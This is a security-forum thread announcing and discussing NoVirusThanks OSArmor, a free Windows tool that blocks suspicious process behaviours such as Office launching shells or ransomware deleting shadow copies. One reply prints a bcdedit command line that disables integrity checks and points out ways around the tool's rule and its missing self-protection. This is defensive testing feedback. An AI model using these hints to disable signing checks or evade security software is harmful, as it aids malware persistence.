NoVirusThanks OSArmor

Discussion in 'NoVirusThanks' started by Evjl's Rain, Dec 17, 2017.

  1. Evjl's Rain

    Evjl's Rain Level 29
    Trusted AV Tester

    Apr 18, 2016
    1,815
    13,237
    Vietnam
    Windows 8.1
    Avast
    Official Website:
    http://www.novirusthanks.org/products/osarmor/
    [​IMG] [​IMG] [​IMG]

    Monitor and block suspicious processes behaviors to prevent infections by malware, ransomware, and other threats. This security application analyzes parent processes and prevents, for example, MS Word from running cmd.exe or powershell.exe, it prevents ransomware from deleting shadow copies of files via vssadmin.exe, it blocks processes with double file extensions (i.e invoice.pdf.exe), it blocks USB-spreading malware, and much more. It monitors commonly exploited processes (such as MS Office, Java, Web Browsers, Adobe PDF, Flash, etc) and blocks suspicious child processes, blocking the exploit payloads and thus preventing the malware infection.

    This program is compatible with other security software and adds an additional layer of defense to prevent malware and ransomware infections. So far, we have added more than 30 smart policies to block malicious processes behaviors and improve your system security. You don't have to configure anything, just install it and forget about it. If needed, you can enable or disable the policies via the "Configurator" application, that needs Admin privileges.


    An Additional Layer of Defense
    This smart security application focuses on preventing a malware infection by applying smart and intelligent rules that block bad processes behaviors. This tool can block threats not detected by your installed security solution. Add to your system an additional layer of defense to prevent infections by malware and ransomware!
    You don't have to configure anything, just install it and forget about it. We have already added more than 30 smart policies to improve your system security with this security application.

    Basic Anti-Exploit
    Analyze parent processes and child processes blocking exploit payloads.

    Protect MS Office Apps
    Prevent WINWORD.EXE or EXCEL.EXE from executing malicious processes.

    Monitor Applications
    Monitor Adobe PDF Reader, MS Office, OpenOffice, Web Browsers, etc.

    Block USB Malware
    Prevent execution of processes started via autorun.inf from USB devices.

    Block Command-Lines
    Block processes with command-line strings commonly related to malware.

    Protect Shadow Copies
    Block system processes (vssadmin.exe, etc) from deleting shadow copies of files.

    Block File Download
    Block specific command-lines related to download of remote files.

    Block .COM & .PIF
    Block execution of processes with .COM or .PIF obsolete file extensions.

    Filter System Processes
    Block wscript.exe, mshta.exe, etc if they match our rules of bad behaviors.

    Block Bcedit.exe
    Prevent important and critical system modifications from Bcedit.exe

    Block Schtasks.exe
    Block the execution of schtasks.exe (commonly used by malware).

    Block Bitsadmin.exe
    Prevent Bitsadmin.exe from downloading (/download) remote files.

    PowerShell Rules
    Block execution of encoded or malformed commands via PowerShell.

    Svchost & Explorer
    Block suspicious behaviors related to Svchost.exe and Explorer.exe.

    Block RegisterXLL()
    Prevent calling of Application.Excel RegisterXLL() via command-line.

    Block Remote Scripts
    Prevent Regsvr32.exe or Mshta.exe from loading remote scripts.

    Very Lightweight
    The software application uses only a few MBs of memory, you will not even notice it.

    Free to Use
    This software is completely free to use for anyone, at home and at work.


    For Windows XP, Vista, 7, 8, 10 (32\64-bit)

    *** Doesn't support Secure Boot for now ***

    Download & more info here:
    Prevent Malware and Ransomware Infections with OSArmor | NoVirusThanks
     
    tonibalas, frogboy, BryanB and 41 others like this.
  2. pablozi

    pablozi Level 22
    Trusted

    Jun 14, 2011
    1,156
    4,928
    Null Island
    Windows 10
    Default-Deny
    Another tool from NVT which will be abandoned after a short period of active development.
     
  3. Peter2150

    Peter2150 Level 6

    Oct 24, 2015
    281
    815
    Washington DC
    Windows 7
    Emsisoft
    And the basis of this claim is....
     
  4. Rengar

    Rengar Level 14

    Jan 6, 2017
    699
    4,436
    Greece
    Windows 8.1
    Avast
    Why are you saying that? lol
     
    BryanB, davisd, given and 7 others like this.
  5. HarborFront

    HarborFront Level 34
    Content Creator

    Oct 9, 2016
    2,305
    5,771
    Far East
    So is this OSArmor the same as NVT ERP or a subset of NVT ERP? With NVT ERP do I still need the OSArmor? Or do I need both for better protection?

    Thanks
     
    BryanB, davisd, rockstarrocks and 8 others like this.
  6. bribon77

    bribon77 Level 11

    Jul 6, 2017
    506
    3,461
    spain
    Windows 7
    Emsisoft
    I have seen it in wilder and I have installed it in Shadow. I have deactivated all my protection and Executed some malwares .. but I have not perceived any alert ... it will be possible to prove this application?? .. it looks good as everything that this developer does. Thank you.:)
     
    BryanB, Andytay70, davisd and 11 others like this.
  7. Evjl's Rain

    Evjl's Rain Level 29
    Trusted AV Tester

    Apr 18, 2016
    1,815
    13,237
    Vietnam
    Windows 8.1
    Avast
    #7 Evjl's Rain, Dec 17, 2017
    Last edited: Dec 17, 2017
    I don't think this app is designed for regular malwares with .exe extension but for scriptors and several malwares which fit the criteria in the checkboxes (for example double extension malware)

    the only I can see it missing is prevention against java malwares, which many AV vendors are not really good at. However I can understand the reason why

    it's working properly as it just blocked my google chrome portable installer from portableapps due to its double extension .paf.exe
     
    BryanB, Andytay70, davisd and 16 others like this.
  8. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,282
    13,635
    Utopia
    The drivers are not yet co-signed, so you might have to disable secure boot to install it on Windows 10. If you ignore the warning and install it anyway, your system will become unbootable until you disable secure boot.

    If your Windows 10 is from an upgrade instead of a clean install, you probably will not have this limitation.
    The dev says he already applied to get sigs for the drivers, and will update the installation file accordingly.
     
  9. pablozi

    pablozi Level 22
    Trusted

    Jun 14, 2011
    1,156
    4,928
    Null Island
    Windows 10
    Default-Deny
    It's just my biased opinion.
    Just look at the website and see how many tools are there.
    Now tell me how many of them are receiving regular updates/fixes?
    Don't get me wrong - I love NVT soft (I even bought ERP license) but it would be better if Andreas could focus on up to 3 main tools instead of creating another tool which will be forgotten after a period of time.
    Anyway I am going to try OSA ;)
     
    tonibalas, BryanB, Andytay70 and 14 others like this.
  10. Peter2150

    Peter2150 Level 6

    Oct 24, 2015
    281
    815
    Washington DC
    Windows 7
    Emsisoft
    There a bunch and most are relatively simple and don't need updates.
     
    BryanB, davisd, rockstarrocks and 8 others like this.
  11. Prorootect

    Prorootect Level 46

    Nov 5, 2011
    3,588
    3,864
    0wN3D by my cat!
    Ah, I have a big desire for this new tool, developers are trusted!

    - It would be my first downloaded software since time immemorial...
    Thank you Evjl's Rain !
     
  12. AtlBo

    AtlBo Level 22

    Dec 29, 2014
    1,144
    4,519
    Qihoo 360
    Yes, looking forward to running this to see where NVT has gone with this tool. It's interesting to me that the dev here has chosen to make the application free for offices. Honestly, I feel like he should reserve the free for the office decision to make at a later date personally. He has given away so much good software over the years. This is how I feel.

    I wonder how this would compare on Windows 7 to the work @Andy Ful is doing with his policy based application (primarily powerful for W10 users?). I guess his is more machine policy control rather actual establishment of policy, as this seems it actually is for Windows 7. Going to be interesting to see how it works on Windows 7 for sure. A little bit strange to see an app with such simple settings. Makes me nervous for some reason. :rolleyes:

    Any other malware testing done, please pass on your findings! Thanks to @bribon77 for his initial tests. :)
     
  13. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    NVT here :)

    Thank you for posting OSArmor here.

    You may want to watch this video that demonstrate how OSArmor can block the payload of a DOC (MSWord) and SWF (Flash) exploit:


    OSArmor is like a behavioral blocker with pre-built rules that block suspicious processes (in short).
    It works by preventing a malware or ransomware infection in real-world scenario.

    You should test it with real-world scenarios:
    - Opening a malicious .DOC\.PDF.\XLS.\etc. file used to exploit MSWord\MSExcel\PDF Reader\etc to drop\download and execute a payload (malware\ransomware\etc) in the system
    - Visiting a malicious website that exploits a vulnerability (Java\Flash Player\PDF\etc) to download and execute a payload in the system
    - And so on. Simply clicking on a .exe file or a .vbs file would not trigger any alert.

    OSArmor can also block fileless malware that execute JS or VBS code, i.e Poweliks:
    Poweliks click-fraud malware goes fileless in attempt to prevent removal

    This tool can really improve the security of the system and requires zero configuration.

    If you have questions just ask, I'll reply here :)
     
    tonibalas, Dacko, BryanB and 31 others like this.
  14. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    @shmu26

    ERP gives you full control on every single application that is installed\executed in the system and is more for advanced users.

    OSArmor is for beginner users (but also for experts) with pre-built rules that requires 0 configuration and adds an additional (solid) layer of defense.
     
    tonibalas, Dacko, BryanB and 21 others like this.
  15. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,184
    5,226
    IRAN
    Windows 10
    ESET
    Worth it for free! even some paid Avs cant do what this free tool can do! right?it is smth like dr.web katana!
     
    Siavash, BryanB, Andytay70 and 9 others like this.
  16. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,282
    13,635
    Utopia
    Thanks for explanations. Is this product designed to work side by side with the new ERP, or will the new ERP still have command line parsing?
     
    BryanB, Andytay70, davisd and 7 others like this.
  17. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    ERP gives you full control on every single application that is installed\executed in the system and is more for advanced users.

    OSArmor is for beginner users (but also for experts) with pre-built rules that requires 0 configuration and adds an additional (solid) layer of defense.
     
    ZeroDay, davisd, given and 13 others like this.
  18. Opcode

    Opcode Level 18
    Content Creator

    Aug 17, 2017
    891
    6,325
    Caille
    Windows 10
    The Bcdedit.exe protection doesn't work by preventing the activity itself, it appears that it works by filtering for command line. I attempted to spawn Dbgview.exe with the fake arguments (which would have been appropriate for Bcdedit.exe) and it still got flagged, despite the target not being Bcdedit.exe. So I wouldn't count your chickens.

    Code:
    Date/Time: 12/17/2017 8:59:41 PM
    Process: [1556]C:\Users\PCNAME\Desktop\Dbgview.exe
    Parent: [3724]C:\Windows\System32\cmd.exe
    Rule: BlockModificationsViaBcedit
    Rule Name: Prevent important system modifications via Bcedit.exe
    Command Line: dbgview.exe  -set loadoptions DDISABLE_INTEGRITY_CHECKS
    Signer: Microsoft Corporation
    
    Strangely, it doesn't flag for TESTSIGNING being enabled. You can use that instead of DDISABLE_INTEGRITY_CHECKS and it won't be flagged?

    However, there's no self-protection. You need to have administrator rights to use the original Bcdedit.exe, and you can break the service for this product with Administrator rights too... Same for editing the config for it in the Registry! So that feature isn't that reliable.

    Still useful and decent though - can be very handy for additional protection & I like how the User Interface is simple to use. All the settings are right there in front of you with hardly any effort at all, ease-of-use. Which is a good thing , After all it is a free product which is really nice and kind of them. The alerts UI looks nice too but would be good to have details put on there
     
  19. bribon77

    bribon77 Level 11

    Jul 6, 2017
    506
    3,461
    spain
    Windows 7
    Emsisoft
    Thank you for being here in MT, We are many who like your Programs.:)
     
  20. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    @Opcode

    We'll add self-protection (for the service only) in the next release, and we'll also add support for blocking "bcdedit.exe -set TESTSIGNING OFF" within the rule "Prevent important system modifications via Bcedit.exe", thanks for reporting it :)
     
    BryanB, ZeroDay, davisd and 17 others like this.
Loading...
Similar Threads Forum Date
Video Review OSArmor by NoVirusThanks- An Overview Video Reviews Jan 12, 2018
Hello from NoVirusThanks New Member Introductions Dec 17, 2017
NoVirusThanks YaGuard Other Security for Windows Apr 18, 2017